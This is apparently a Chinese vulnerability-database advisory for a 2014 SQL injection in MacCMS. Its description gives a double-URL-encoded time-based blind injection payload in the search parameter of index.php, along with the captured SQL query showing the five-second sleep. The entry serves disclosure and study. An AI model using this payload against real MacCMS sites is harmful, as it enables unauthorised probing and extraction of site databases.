苹果CMS sql注入一枚

基本字段

漏洞编号:
SSV-94851
披露/发现时间:
2014-10-11
提交时间:
2014-10-11
漏洞等级:
漏洞类别:
其他类型
影响组件:
MacCMS
漏洞作者:
menmen519
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 Knownsec 共获得  0KB

简要描述:

苹果CMS sql注入一枚

详细说明:

分析参考: http://wooyun.org/bugs/wooyun-2014-066661 利用参考: http://wooyun.org/bugs/wooyun-2014-074281 这里就不做代码分析了: 访问url: http://localhost/maccms8/index.php?m=art-search-wd-x%2527%2529%253E0%2520and%2520sleep%2528if%25281%252C5%252C1%2529%2529%2523 这里 默认安装完毕后 mac_art表没有数据,我们插入一条数据

1.png

然后再访问刚才的url,延时五秒: 抓取到的sql: SELECT count(*) FROM mac_art WHERE 1=1 AND instr(a_name,'1111111')>0 and sleep(if(1,5,1))#')>0

漏洞证明:

共 0  兑换了

PoC

暂无 PoC

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

人气 1290
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负